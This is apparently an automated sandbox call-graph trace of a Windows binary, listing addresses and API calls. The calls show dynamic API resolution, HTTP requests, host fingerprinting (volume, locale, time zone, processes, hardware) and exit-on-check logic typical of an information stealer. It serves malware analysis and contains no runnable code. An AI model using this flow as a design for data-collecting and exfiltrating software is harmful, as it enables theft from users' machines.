14282->14283 14284 5c4590 14283->14284 14285 5c45c0 2 API calls 14284->14285 14286 5c45a9 14285->14286 14287 5d9c10 14286->14287 14288 5da036 8 API calls 14287->14288 14289 5d9c20 43 API calls 14287->14289 14290 5da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14288->14290 14291 5da146 14288->14291 14289->14288 14290->14291 14292 5da216 14291->14292 14293 5da153 8 API calls 14291->14293 14294 5da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14294 14295 5da298 14292->14295 14293->14292 14294->14295 14296 5da2a5 6 API calls 14295->14296 14297 5da337 14295->14297 14296->14297 14298 5da41f 14297->14298 14299 5da344 9 API calls 14297->14299 14300 5da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14298->14300 14301 5da4a2 14298->14301 14299->14298 14300->14301 14302 5da4dc 14301->14302 14303 5da4ab GetProcAddress GetProcAddress 14301->14303 14304 5da515 14302->14304 14305 5da4e5 GetProcAddress GetProcAddress 14302->14305 14303->14302 14306 5da612 14304->14306 14307 5da522 10 API calls 14304->14307 14305->14304 14308 5da67d 14306->14308 14309 5da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14306->14309 14307->14306 14310 5da69e 14308->14310 14311 5da686 GetProcAddress 14308->14311 14309->14308 14312 5d5ca3 14310->14312 14313 5da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14310->14313 14311->14310 14314 5c1590 14312->14314 14313->14312 15435 5c1670 14314->15435 14317 5da7a0 lstrcpy 14318 5c15b5 14317->14318 14319 5da7a0 lstrcpy 14318->14319 14320 5c15c7 14319->14320 14321 5da7a0 lstrcpy 14320->14321 14322 5c15d9 14321->14322 14323 5da7a0 lstrcpy 14322->14323 14324 5c1663 14323->14324 14325 5d5510 14324->14325 14326 5d5521 14325->14326 14327 5da820 2 API calls 14326->14327 14328 5d552e 14327->14328 14329 5da820 2 API calls 14328->14329 14330 5d553b 14329->14330 14331 5da820 2 API calls 14330->14331 14332 5d5548 14331->14332 14333 5da740 lstrcpy 14332->14333 14334 5d5555 14333->14334 14335 5da740 lstrcpy 14334->14335 14336 5d5562 14335->14336 14337 5da740 lstrcpy 14336->14337 14338 5d556f 14337->14338 14339 5da740 lstrcpy 14338->14339 14379 5d557c 14339->14379 14340 5da740 lstrcpy 14340->14379 14341 5d5643 StrCmpCA 14341->14379 14342 5d56a0 StrCmpCA 14343 5d57dc 14342->14343 14342->14379 14344 5da8a0 lstrcpy 14343->14344 14345 5d57e8 14344->14345 14346 5da820 2 API calls 14345->14346 14347 5d57f6 14346->14347 14349 5da820 2 API calls 14347->14349 14348 5d5856 StrCmpCA 14350 5d5991 14348->14350 14348->14379 14352 5d5805 14349->14352 14351 5da8a0 lstrcpy 14350->14351 14354 5d599d 14351->14354 14355 5c1670 lstrcpy 14352->14355 14353 5c1590 lstrcpy 14353->14379 14357 5da820 2 API calls 14354->14357 14377 5d5811 14355->14377 14356 5da820 lstrlen lstrcpy 14356->14379 14360 5d59ab 14357->14360 14358 5d52c0 25 API calls 14358->14379 14359 5d51f0 20 API calls 14359->14379 14362 5da820 2 API calls 14360->14362 14361 5d5a0b StrCmpCA 14363 5d5a28 14361->14363 14364 5d5a16 Sleep 14361->14364 14367 5d59ba 14362->14367 14365 5da8a0 lstrcpy 14363->14365 14364->14379 14368 5d5a34 14365->14368 14366 5da8a0 lstrcpy 14366->14379 14369 5c1670 lstrcpy 14367->14369 14370 5da820 2 API calls 14368->14370 14369->14377 14371 5d5a43 14370->14371 14372 5da820 2 API calls 14371->14372 14373 5d5a52 14372->14373 14375 5c1670 lstrcpy 14373->14375 14374 5d578a StrCmpCA 14374->14379 14375->14377 14376 5da7a0 lstrcpy 14376->14379 14377->13432 14378 5d593f StrCmpCA 14378->14379 14379->14340 14379->14341 14379->14342 14379->14348 14379->14353 14379->14356 14379->14358 14379->14359 14379->14361 14379->14366 14379->14374 14379->14376 14379->14378 14381 5d754c 14380->14381 14382 5d7553 GetVolumeInformationA 14380->14382 14381->14382 14387 5d7591 14382->14387 14383 5d75fc GetProcessHeap RtlAllocateHeap 14384 5d7619 14383->14384 14385 5d7628 wsprintfA 14383->14385 14388 5da740 lstrcpy 14384->14388 14386 5da740 lstrcpy 14385->14386 14389 5d5da7 14386->14389 14387->14383 14388->14389 14389->13453 14391 5da7a0 lstrcpy 14390->14391 14392 5c4899 14391->14392 15444 5c47b0 14392->15444 14394 5c48a5 14395 5da740 lstrcpy 14394->14395 14396 5c48d7 14395->14396 14397 5da740 lstrcpy 14396->14397 14398 5c48e4 14397->14398 14399 5da740 lstrcpy 14398->14399 14400 5c48f1 14399->14400 14401 5da740 lstrcpy 14400->14401 14402 5c48fe 14401->14402 14403 5da740 lstrcpy 14402->14403 14404 5c490b InternetOpenA StrCmpCA 14403->14404 14405 5c4944 14404->14405 14406 5c4ecb InternetCloseHandle 14405->14406 15450 5d8b60 14405->15450 14408 5c4ee8 14406->14408 15465 5c9ac0 CryptStringToBinaryA 14408->15465 14409 5c4963 15458 5da920 14409->15458 14412 5c4976 14414 5da8a0 lstrcpy 14412->14414 14419 5c497f 14414->14419 14415 5da820 2 API calls 14416 5c4f05 14415->14416 14417 5da9b0 4 API calls 14416->14417 14420 5c4f1b 14417->14420 14418 5c4f27 ctype 14422 5da7a0 lstrcpy 14418->14422 14423 5da9b0 4 API calls 14419->14423 14421 5da8a0 lstrcpy 14420->14421 14421->14418 14435 5c4f57 14422->14435 14424 5c49a9 14423->14424 14425 5da8a0 lstrcpy 14424->14425 14426 5c49b2 14425->14426 14427 5da9b0 4 API calls 14426->14427 14428 5c49d1 14427->14428 14429 5da8a0 lstrcpy 14428->14429 14430 5c49da 14429->14430 14431 5da920 3 API calls 14430->14431 14432 5c49f8 14431->14432 14433 5da8a0 lstrcpy 14432->14433 14434 5c4a01 14433->14434 14436 5da9b0 4 API calls 14434->14436 14435->13456 14437 5c4a20 14436->14437 14438 5da8a0 lstrcpy 14437->14438 14439 5c4a29 14438->14439 14440 5da9b0 4 API calls 14439->14440 14441 5c4a48 14440->14441 14442 5da8a0 lstrcpy 14441->14442 14443 5c4a51 14442->14443 14444 5da9b0 4 API calls 14443->14444 14445 5c4a7d 14444->14445 14446 5da920 3 API calls 14445->14446 14447 5c4a84 14446->14447 14448 5da8a0 lstrcpy 14447->14448 14449 5c4a8d 14448->14449 14450 5c4aa3 InternetConnectA 14449->14450 14450->14406 14451 5c4ad3 HttpOpenRequestA 14450->14451 14453 5c4ebe InternetCloseHandle 14451->14453 14454 5c4b28 14451->14454 14453->14406 14455 5da9b0 4 API calls 14454->14455 14456 5c4b3c 14455->14456 14457 5da8a0 lstrcpy 14456->14457 14458 5c4b45 14457->14458 14459 5da920 3 API calls 14458->14459 14460 5c4b63 14459->14460 14461 5da8a0 lstrcpy 14460->14461 14462 5c4b6c 14461->14462 14463 5da9b0 4 API calls 14462->14463 14464 5c4b8b 14463->14464 14465 5da8a0 lstrcpy 14464->14465 14466 5c4b94 14465->14466 14467 5da9b0 4 API calls 14466->14467 14468 5c4bb5 14467->14468 14469 5da8a0 lstrcpy 14468->14469 14470 5c4bbe 14469->14470 14471 5da9b0 4 API calls 14470->14471 14472 5c4bde 14471->14472 14473 5da8a0 lstrcpy 14472->14473 14474 5c4be7 14473->14474 14475 5da9b0 4 API calls 14474->14475 14476 5c4c06 14475->14476 14477 5da8a0 lstrcpy 14476->14477 14478 5c4c0f 14477->14478 14479 5da920 3 API calls 14478->14479 14480 5c4c2d 14479->14480 14481 5da8a0 lstrcpy 14480->14481 14482 5c4c36 14481->14482 14483 5da9b0 4 API calls 14482->14483 14484 5c4c55 14483->14484 14485 5da8a0 lstrcpy 14484->14485 14486 5c4c5e 14485->14486 14487 5da9b0 4 API calls 14486->14487 14488 5c4c7d 14487->14488 14489 5da8a0 lstrcpy 14488->14489 14490 5c4c86 14489->14490 14491 5da920 3 API calls 14490->14491 14492 5c4ca4 14491->14492 14493 5da8a0 lstrcpy 14492->14493 14494 5c4cad 14493->14494 14495 5da9b0 4 API calls 14494->14495 14496 5c4ccc 14495->14496 14497 5da8a0 lstrcpy 14496->14497 14498 5c4cd5 14497->14498 14499 5da9b0 4 API calls 14498->14499 14500 5c4cf6 14499->14500 14501 5da8a0 lstrcpy 14500->14501 14502 5c4cff 14501->14502 14503 5da9b0 4 API calls 14502->14503 14504 5c4d1f 14503->14504 14505 5da8a0 lstrcpy 14504->14505 14506 5c4d28 14505->14506 14507 5da9b0 4 API calls 14506->14507 14508 5c4d47 14507->14508 14509 5da8a0 lstrcpy 14508->14509 14510 5c4d50 14509->14510 14511 5da920 3 API calls 14510->14511 14512 5c4d6e 14511->14512 14513 5da8a0 lstrcpy 14512->14513 14514 5c4d77 14513->14514 14515 5da740 lstrcpy 14514->14515 14516 5c4d92 14515->14516 14517 5da920 3 API calls 14516->14517 14518 5c4db3 14517->14518 14519 5da920 3 API calls 14518->14519 14520 5c4dba 14519->14520 14521 5da8a0 lstrcpy 14520->14521 14522 5c4dc6 14521->14522 14523 5c4de7 lstrlen 14522->14523 14524 5c4dfa 14523->14524 14525 5c4e03 lstrlen 14524->14525 15464 5daad0 14525->15464 14527 5c4e13 HttpSendRequestA 14528 5c4e32 InternetReadFile 14527->14528 14529 5c4e67 InternetCloseHandle 14528->14529 14534 5c4e5e 14528->14534 14532 5da800 14529->14532 14531 5da9b0 4 API calls 14531->14534 14532->14453 14533 5da8a0 lstrcpy 14533->14534 14534->14528 14534->14529 14534->14531 14534->14533 15471 5daad0 14535->15471 14537 5d17c4 StrCmpCA 14538 5d17cf ExitProcess 14537->14538 14542 5d17d7 14537->14542 14539 5d19c2 14539->13458 14540 5d185d StrCmpCA 14540->14542 14541 5d187f StrCmpCA 14541->14542 14542->14539 14542->14540 14542->14541 14543 5d18f1 StrCmpCA 14542->14543 14544 5d1951 StrCmpCA 14542->14544 14545 5d1970 StrCmpCA 14542->14545 14546 5d1913 StrCmpCA 14542->14546 14547 5d1932 StrCmpCA 14542->14547 14548 5d18ad StrCmpCA 14542->14548 14549 5d18cf StrCmpCA 14542->14549 14550 5da820 lstrlen lstrcpy 14542->14550 14543->14542 14544->14542 14545->14542 14546->14542 14547->14542 14548->14542 14549->14542 14550->14542 14552 5da7a0 lstrcpy 14551->14552 14553 5c5979 14552->14553 14554 5c47b0 2 API calls 14553->14554 14555 5c5985 14554->14555 14556 5da740 lstrcpy 14555->14556 14557 5c59ba 14556->14557 14558 5da740 lstrcpy 14557->14558 14559 5c59c7 14558->14559 14560 5da740 lstrcpy 14559->14560 14561 5c59d4 14560->14561 14562 5da740 lstrcpy 14561->14562 14563 5c59e1 14562->14563 14564 5da740 lstrcpy 14563->14564 14565 5c59ee InternetOpenA StrCmpCA 14564->14565 14566 5c5a1d 14565->14566 14567 5c5fc3 InternetCloseHandle 14566->14567 14568 5d8b60 3 API calls 14566->14568 14569 5c5fe0 14567->14569 14570 5c5a3c 14568->14570 14572 5c9ac0 4 API calls 14569->14572 14571 5da920 3 API calls 14570->14571 14573 5c5a4f 14571->14573 14574 5c5fe6 14572->14574 14575 5da8a0 lstrcpy 14573->14575 14576 5da820 2 API calls 14574->14576 14578 5c601f ctype 14574->14578 14580 5c5a58 14575->14580 14577 5c5ffd 14576->14577 14579 5da9b0 4 API calls 14577->14579 14582 5da7a0 lstrcpy 14578->14582 14581 5c6013 14579->14581 14584 5da9b0 4 API calls 14580->14584 14583 5da8a0 lstrcpy 14581->14583 14592 5c604f 14582->14592 14583->14578 14585 5c5a82 14584->14585 14586 5da8a0 lstrcpy 14585->14586 14587 5c5a8b 14586->14587 14588 5da9b0 4 API calls 14587->14588 14589 5c5aaa 14588->14589 14590 5da8a0 lstrcpy 14589->14590 14591 5c5ab3 14590->14591 14593 5da920 3 API calls 14591->14593 14592->13464 14594 5c5ad1 14593->14594 14595 5da8a0 lstrcpy 14594->14595 14596 5c5ada 14595->14596 14597 5da9b0 4 API calls 14596->14597 14598 5c5af9 14597->14598 14599 5da8a0 lstrcpy 14598->14599 14600 5c5b02 14599->14600 14601 5da9b0 4 API calls 14600->14601 14602 5c5b21 14601->14602 14603 5da8a0 lstrcpy 14602->14603 14604 5c5b2a 14603->14604 14605 5da9b0 4 API calls 14604->14605 14606 5c5b56 14605->14606 14607 5da920 3 API calls 14606->14607 14608 5c5b5d 14607->14608 14609 5da8a0 lstrcpy 14608->14609 14610 5c5b66 14609->14610 14611 5c5b7c InternetConnectA 14610->14611 14611->14567 14612 5c5bac HttpOpenRequestA 14611->14612 14614 5c5c0b 14612->14614 14615 5c5fb6 InternetCloseHandle 14612->14615 14616 5da9b0 4 API calls 14614->14616 14615->14567 14617 5c5c1f 14616->14617 14618 5da8a0 lstrcpy 14617->14618 14619 5c5c28 14618->14619 14620 5da920 3 API calls 14619->14620 14621 5c5c46 14620->14621 14622 5da8a0 lstrcpy 14621->14622 14623 5c5c4f 14622->14623 14624 5da9b0 4 API calls 14623->14624 14625 5c5c6e 14624->14625 14626 5da8a0 lstrcpy 14625->14626 14627 5c5c77 14626->14627 14628 5da9b0 4 API calls 14627->14628 14629 5c5c98 14628->14629 14630 5da8a0 lstrcpy 14629->14630 14631 5c5ca1 14630->14631 14632 5da9b0 4 API calls 14631->14632 14633 5c5cc1 14632->14633 14634 5da8a0 lstrcpy 14633->14634 14635 5c5cca 14634->14635 14636 5da9b0 4 API calls 14635->14636 14637 5c5ce9 14636->14637 14638 5da8a0 lstrcpy 14637->14638 14639 5c5cf2 14638->14639 14640 5da920 3 API calls 14639->14640 14641 5c5d10 14640->14641 14642 5da8a0 lstrcpy 14641->14642 14643 5c5d19 14642->14643 14644 5da9b0 4 API calls 14643->14644 14645 5c5d38 14644->14645 14646 5da8a0 lstrcpy 14645->14646 14647 5c5d41 14646->14647 14648 5da9b0 4 API calls 14647->14648 14649 5c5d60 14648->14649 14650 5da8a0 lstrcpy 14649->14650 14651 5c5d69 14650->14651 14652 5da920 3 API calls 14651->14652 14653 5c5d87 14652->14653 14654 5da8a0 lstrcpy 14653->14654 14655 5c5d90 14654->14655 14656 5da9b0 4 API calls 14655->14656 14657 5c5daf 14656->14657 14658 5da8a0 lstrcpy 14657->14658 14659 5c5db8 14658->14659 14660 5da9b0 4 API calls 14659->14660 14661 5c5dd9 14660->14661 14662 5da8a0 lstrcpy 14661->14662 14663 5c5de2 14662->14663 14664 5da9b0 4 API calls 14663->14664 14665 5c5e02 14664->14665 14666 5da8a0 lstrcpy 14665->14666 14667 5c5e0b 14666->14667 14668 5da9b0 4 API calls 14667->14668 14669 5c5e2a 14668->14669 14670 5da8a0 lstrcpy 14669->14670 14671 5c5e33 14670->14671 14672 5da920 3 API calls 14671->14672 14673 5c5e54 14672->14673 14674 5da8a0 lstrcpy 14673->14674 14675 5c5e5d 14674->14675 14676 5c5e70 lstrlen 14675->14676 15472 5daad0 14676->15472 14678 5c5e81 lstrlen GetProcessHeap RtlAllocateHeap 15473 5daad0 14678->15473 14680 5c5eae lstrlen 14681 5c5ebe 14680->14681 14682 5c5ed7 lstrlen 14681->14682 14683 5c5ee7 14682->14683 14684 5c5ef0 lstrlen 14683->14684 14685 5c5f04 14684->14685 14686 5c5f1a lstrlen 14685->14686 15474 5daad0 14686->15474 14688 5c5f2a HttpSendRequestA 14689 5c5f35 InternetReadFile 14688->14689 14690 5c5f6a InternetCloseHandle 14689->14690 14694 5c5f61 14689->14694 14690->14615 14692 5da9b0 4 API calls 14692->14694 14693 5da8a0 lstrcpy 14693->14694 14694->14689 14694->14690 14694->14692 14694->14693 14697 5d1077 14695->14697 14696 5d1151 14696->13466 14697->14696 14698 5da820 lstrlen lstrcpy 14697->14698 14698->14697 14700 5d0db7 14699->14700 14701 5d0f17 14700->14701 14702 5d0ea4 StrCmpCA 14700->14702 14703 5d0e27 StrCmpCA 14700->14703 14704 5d0e67 StrCmpCA 14700->14704 14705 5da820 lstrlen lstrcpy 14700->14705 14701->13474 14702->14700 14703->14700 14704->14700 14705->14700 14709 5d0f67 14706->14709 14707 5d1044 14707->13482 14708 5d0fb2 StrCmpCA 14708->14709 14709->14707 14709->14708 14710 5da820 lstrlen lstrcpy 14709->14710 14710->14709 14712 5da740 lstrcpy 14711->14712 14713 5d1a26 14712->14713 14714 5da9b0 4 API calls 14713->14714 14715 5d1a37 14714->14715 14716 5da8a0 lstrcpy 14715->14716 14717 5d1a40 14716->14717 14718 5da9b0 4 API calls 14717->14718 14719 5d1a5b 14718->14719 14720 5da8a0 lstrcpy 14719->14720 14721 5d1a64 14720->14721 14722 5da9b0 4 API calls 14721->14722 14723 5d1a7d 14722->14723 14724 5da8a0 lstrcpy 14723->14724 14725 5d1a86 14724->14725 14726 5da9b0 4 API calls 14725->14726 14727 5d1aa1 14726->14727 14728 5da8a0 lstrcpy 14727->14728 14729 5d1aaa 14728->14729 14730 5da9b0 4 API calls 14729->14730 14731 5d1ac3 14730->14731 14732 5da8a0 lstrcpy 14731->14732 14733 5d1acc 14732->14733 14734 5da9b0 4 API calls 14733->14734 14735 5d1ae7 14734->14735 14736 5da8a0 lstrcpy 14735->14736 14737 5d1af0 14736->14737 14738 5da9b0 4 API calls 14737->14738 14739 5d1b09 14738->14739 14740 5da8a0 lstrcpy 14739->14740 14741 5d1b12 14740->14741 14742 5da9b0 4 API calls 14741->14742 14743 5d1b2d 14742->14743 14744 5da8a0 lstrcpy 14743->14744 14745 5d1b36 14744->14745 14746 5da9b0 4 API calls 14745->14746 14747 5d1b4f 14746->14747 14748 5da8a0 lstrcpy 14747->14748 14749 5d1b58 14748->14749 14750 5da9b0 4 API calls 14749->14750 14751 5d1b76 14750->14751 14752 5da8a0 lstrcpy 14751->14752 14753 5d1b7f 14752->14753 14754 5d7500 6 API calls 14753->14754 14755 5d1b96 14754->14755 14756 5da920 3 API calls 14755->14756 14757 5d1ba9 14756->14757 14758 5da8a0 lstrcpy 14757->14758 14759 5d1bb2 14758->14759 14760 5da9b0 4 API calls 14759->14760 14761 5d1bdc 14760->14761 14762 5da8a0 lstrcpy 14761->14762 14763 5d1be5 14762->14763 14764 5da9b0 4 API calls 14763->14764 14765 5d1c05 14764->14765 14766 5da8a0 lstrcpy 14765->14766 14767 5d1c0e 14766->14767 15475 5d7690 GetProcessHeap RtlAllocateHeap 14767->15475 14770 5da9b0 4 API calls 14771 5d1c2e 14770->14771 14772 5da8a0 lstrcpy 14771->14772 14773 5d1c37 14772->14773 14774 5da9b0 4 API calls 14773->14774 14775 5d1c56 14774->14775 14776 5da8a0 lstrcpy 14775->14776 14777 5d1c5f 14776->14777 14778 5da9b0 4 API calls 14777->14778 14779 5d1c80 14778->14779 14780 5da8a0 lstrcpy 14779->14780 14781 5d1c89 14780->14781 15482 5d77c0 GetCurrentProcess IsWow64Process 14781->15482 14784 5da9b0 4 API calls 14785 5d1ca9 14784->14785 14786 5da8a0 lstrcpy 14785->14786 14787 5d1cb2 14786->14787 14788 5da9b0 4 API calls 14787->14788 14789 5d1cd1 14788->14789 14790 5da8a0 lstrcpy 14789->14790 14791 5d1cda 14790->14791 14792 5da9b0 4 API calls 14791->14792 14793 5d1cfb 14792->14793 14794 5da8a0 lstrcpy 14793->14794 14795 5d1d04 14794->14795 14796 5d7850 3 API calls 14795->14796 14797 5d1d14 14796->14797 14798 5da9b0 4 API calls 14797->14798 14799 5d1d24 14798->14799 14800 5da8a0 lstrcpy 14799->14800 14801 5d1d2d 14800->14801 14802 5da9b0 4 API calls 14801->14802 14803 5d1d4c 14802->14803 14804 5da8a0 lstrcpy 14803->14804 14805 5d1d55 14804->14805 14806 5da9b0 4 API calls 14805->14806 14807 5d1d75 14806->14807 14808 5da8a0 lstrcpy 14807->14808 14809 5d1d7e 14808->14809 14810 5d78e0 3 API calls 14809->14810 14811 5d1d8e 14810->14811 14812 5da9b0 4 API calls 14811->14812 14813 5d1d9e 14812->14813 14814 5da8a0 lstrcpy 14813->14814 14815 5d1da7 14814->14815 14816 5da9b0 4 API calls 14815->14816 14817 5d1dc6 14816->14817 14818 5da8a0 lstrcpy 14817->14818 14819 5d1dcf 14818->14819 14820 5da9b0 4 API calls 14819->14820 14821 5d1df0 14820->14821 14822 5da8a0 lstrcpy 14821->14822 14823 5d1df9 14822->14823 15484 5d7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14823->15484 14826 5da9b0 4 API calls 14827 5d1e19 14826->14827 14828 5da8a0 lstrcpy 14827->14828 14829 5d1e22 14828->14829 14830 5da9b0 4 API calls 14829->14830 14831 5d1e41 14830->14831 14832 5da8a0 lstrcpy 14831->14832 14833 5d1e4a 14832->14833 14834 5da9b0 4 API calls 14833->14834 14835 5d1e6b 14834->14835 14836 5da8a0 lstrcpy 14835->14836 14837 5d1e74 14836->14837 15486 5d7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14837->15486 14840 5da9b0 4 API calls 14841 5d1e94 14840->14841 14842 5da8a0 lstrcpy 14841->14842 14843 5d1e9d 14842->14843 14844 5da9b0 4 API calls 14843->14844 14845 5d1ebc 14844->14845 14846 5da8a0 lstrcpy 14845->14846 14847 5d1ec5 14846->14847 14848 5da9b0 4 API calls 14847->14848 14849 5d1ee5 14848->14849 14850 5da8a0 lstrcpy 14849->14850 14851 5d1eee 14850->14851 15489 5d7b00 GetUserDefaultLocaleName 14851->15489 14854 5da9b0 4 API calls 14855 5d1f0e 14854->14855 14856 5da8a0 lstrcpy 14855->14856 14857 5d1f17 14856->14857 14858 5da9b0 4 API calls 14857->14858 14859 5d1f36 14858->14859 14860 5da8a0 lstrcpy 14859->14860 14861 5d1f3f 14860->14861 14862 5da9b0 4 API calls 14861->14862 14863 5d1f60 14862->14863 14864 5da8a0 lstrcpy 14863->14864 14865 5d1f69 14864->14865 15493 5d7b90 14865->15493 14867 5d1f80 14868 5da920 3 API calls 14867->14868 14869 5d1f93 14868->14869 14870 5da8a0 lstrcpy 14869->14870 14871 5d1f9c 14870->14871 14872 5da9b0 4 API calls 14871->14872 14873 5d1fc6 14872->14873 14874 5da8a0 lstrcpy 14873->14874 14875 5d1fcf 14874->14875 14876 5da9b0 4 API calls 14875->14876 14877 5d1fef 14876->14877 14878 5da8a0 lstrcpy 14877->14878 14879 5d1ff8 14878->14879 15505 5d7d80 GetSystemPowerStatus 14879->15505 14882 5da9b0 4 API calls 14883 5d2018 14882->14883 14884 5da8a0 lstrcpy 14883->14884 14885 5d2021 14884->14885 14886 5da9b0 4 API calls 14885->14886 14887 5d2040 14886->14887 14888 5da8a0 lstrcpy 14887->14888 14889 5d2049 14888->14889 14890 5da9b0 4 API calls 14889->14890 14891 5d206a 14890->14891 14892 5da8a0 lstrcpy 14891->14892 14893 5d2073 14892->14893 14894 5d207e GetCurrentProcessId 14893->14894 15507 5d9470 OpenProcess 14894->15507 14897 5da920 3 API calls 14898 5d20a4 14897->14898 14899 5da8a0 lstrcpy 14898->14899 14900 5d20ad 14899->14900 14901 5da9b0 4 API calls 14900->14901 14902 5d20d7 14901->14902 14903 5da8a0 lstrcpy 14902->14903 14904 5d20e0 14903->14904 14905 5da9b0 4 API calls 14904->14905 14906 5d2100 14905->14906 14907 5da8a0 lstrcpy 14906->14907 14908 5d2109 14907->14908 15512 5d7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14908->15512 14911 5da9b0 4 API calls 14912 5d2129 14911->14912 14913 5da8a0 lstrcpy 14912->14913 14914 5d2132 14913->14914 14915 5da9b0 4 API calls 14914->14915 14916 5d2151 14915->14916 14917 5da8a0 lstrcpy 14916->14917 14918 5d215a 14917->14918 14919 5da9b0 4 API calls 14918->14919 14920 5d217b 14919->14920 14921 5da8a0 lstrcpy 14920->14921 14922 5d2184 14921->14922 15516 5d7f60 14922->15516 14925 5da9b0 4 API calls 14926 5d21a4 14925->14926 14927 5da8a0 lstrcpy 14926->14927 14928 5d21ad 14927->14928 14929 5da9b0 4 API calls 14928->14929 14930 5d21cc 14929->14930 14931 5da8a0 lstrcpy 14930->14931 14932 5d21d5 14931->14932 14933 5da9b0 4 API calls 14932->14933 14934 5d21f6 14933->14934 14935 5da8a0 lstrcpy 14934->14935 14936 5d21ff 14935->14936 15529 5d7ed0 GetSystemInfo wsprintfA 14936->15529 14939 5da9b0 4 API calls 14940 5d221f 14939->14940 14941 5da8a0 lstrcpy 14940->14941 14942 5d2228 14941->14942 14943 5da9b0 4 API calls 14942->14943 14944 5d2247 14943->14944 14945 5da8a0 lstrcpy 14944->14945 14946 5d2250 14945->14946 14947 5da9b0 4 API calls 14946->14947 14948 5d2270 14947->14948 14949 5da8a0 lstrcpy 14948->14949 14950 5d2279 14949->14950 15531 5d8100 GetProcessHeap RtlAllocateHeap 14950->15531 14953 5da9b0 4 API calls 14954 5d2299 14953->14954 14955 5da8a0 lstrcpy 14954->14955 14956 5d22a2 14955->14956 14957 5da9b0 4 API calls 14956->14957 14958 5d22c1 14957->14958 14959 5da8a0 lstrcpy 14958->14959 14960 5d22ca 14959->14960 14961 5da9b0 4 API calls 14960->14961 14962 5d22eb 14961->14962 14963 5da8a0 lstrcpy 14962->14963 14964 5d22f4 14963->14964 15537 5d87c0 14964->15537 14967 5da920 3 API calls 14968 5d231e 14967->14968 14969 5da8a0 lstrcpy 14968->14969 14970 5d2327 14969->14970 14971 5da9b0 4 API calls 14970->14971 14972 5d2351 14971->14972 14973 5da8a0 lstrcpy 14972->14973 14974 5d235a 14973->14974 14975 5da9b0 4 API calls 14974->14975 14976 5d237a 14975->14976 14977 5da8a0 lstrcpy 14976->14977 14978 5d2383 14977->14978 14979 5da9b0 4 API calls 14978->14979 14980 5d23a2 14979->14980 14981 5da8a0 lstrcpy 14980->14981 14982 5d23ab 14981->14982 15542 5d81f0 14982->15542 14984 5d23c2 14985 5da920 3 API calls 14984->14985 14986 5d23d5 14985->14986 14987 5da8a0 lstrcpy 14986->14987 14988 5d23de 14987->14988 14989 5da9b0 4 API calls 14988->14989 14990 5d240a 14989->14990 14991 5da8a0 lstrcpy 14990->14991 14992 5d2413 14991->14992 14993 5da9b0 4 API calls 14992->14993 14994 5d2432 14993->14994 14995 5da8a0 lstrcpy 14994->14995 14996 5d243b 14995->14996 14997 5da9b0 4 API calls 14996->14997 14998 5d245c 14997->14998 14999 5da8a0 lstrcpy 14998->14999 15000 5d2465 14999->15000 15001 5da9b0 4 API calls 15000->15001 15002 5d2484 15001->15002 15003 5da8a0 lstrcpy 15002->15003 15004 5d248d 15003->15004 15005 5da9b0 4 API calls 15004->15005 15006 5d24ae 15005->15006 15007 5da8a0 lstrcpy 15006->15007 15008 5d24b7 15007->15008 15550 5d8320 15008->15550 15010 5d24d3 15011 5da920 3 API calls 15010->15011 15012 5d24e6 15011->15012 15013 5da8a0 lstrcpy 15012->15013 15014 5d24ef 15013->15014 15015 5da9b0 4 API calls 15014->15015 15016 5d2519 15015->15016 15017 5da8a0 lstrcpy 15016->15017 15018 5d2522 15017->15018 15019 5da9b0 4 API calls 15018->15019 15020 5d2543 15019->15020 15021 5da8a0 lstrcpy 15020->15021 15022 5d254c 15021->15022 15023 5d8320 17 API calls 15022->15023 15024 5d2568 15023->15024 15025 5da920 3 API calls 15024->15025 15026 5d257b 15025->15026 15027 5da8a0 lstrcpy 15026->15027 15028 5d2584 15027->15028 15029 5da9b0 4 API calls 15028->15029 15030 5d25ae 15029->15030 15031 5da8a0 lstrcpy 15030->15031 15032 5d25b7 15031->15032 15033 5da9b0 4 API calls 15032->15033 15034 5d25d6 15033->15034 15035 5da8a0 lstrcpy 15034->15035 15036 5d25df 15035->15036 15037 5da9b0 4 API calls 15036->15037 15038 5d2600 15037->15038 15039 5da8a0 lstrcpy 15038->15039 15040 5d2609 15039->15040 15586 5d8680 15040->15586 15042 5d2620 15043 5da920 3 API calls 15042->15043 15044 5d2633 15043->15044 15045 5da8a0 lstrcpy 15044->15045 15046 5d263c 15045->15046 15047 5d265a lstrlen 15046->15047 15048 5d266a 15047->15048 15049 5da740 lstrcpy 15048->15049 15050 5d267c 15049->15050 15051 5c1590 lstrcpy 15050->15051 15052 5d268d 15051->15052 15596 5d5190 15052->15596 15054 5d2699 15054->13486 15784 5daad0 15055->15784 15057 5c5009 InternetOpenUrlA 15061 5c5021 15057->15061 15058 5c502a InternetReadFile 15058->15061 15059 5c50a0 InternetCloseHandle InternetCloseHandle 15060 5c50ec 15059->15060 15060->13490 15061->15058 15061->15059 15785 5c98d0 15062->15785 15064 5d0759 15065 5d077d 15064->15065 15066 5d0a38 15064->15066 15068 5d0799 StrCmpCA 15065->15068 15067 5c1590 lstrcpy 15066->15067 15069 5d0a49 15067->15069 15071 5d0843 15068->15071 15072 5d07a8 15068->15072 15961 5d0250 15069->15961 15075 5d0865 StrCmpCA 15071->15075 15074 5da7a0 lstrcpy 15072->15074 15076 5d07c3 15074->15076 15077 5d0874 15075->15077 15114 5d096b 15075->15114 15078 5c1590 lstrcpy 15076->15078 15079 5da740 lstrcpy 15077->15079 15080 5d080c 15078->15080 15082 5d0881 15079->15082 15083 5da7a0 lstrcpy 15080->15083 15081 5d099c StrCmpCA 15084 5d09ab 15081->15084 15085 5d0a2d 15081->15085 15086 5da9b0 4 API calls 15082->15086 15087 5d0823 15083->15087 15088 5c1590 lstrcpy 15084->15088 15085->13494 15089 5d08ac 15086->15089 15090 5da7a0 lstrcpy 15087->15090 15091 5d09f4 15088->15091 15092 5da920 3 API calls 15089->15092 15093 5d083e 15090->15093 15094 5da7a0 lstrcpy 15091->15094 15095 5d08b3 15092->15095 15788 5cfb00 15093->15788 15097 5d0a0d 15094->15097 15098 5da9b0 4 API calls 15095->15098 15099 5da7a0 lstrcpy 15097->15099 15100 5d08ba 15098->15100 15101 5d0a28 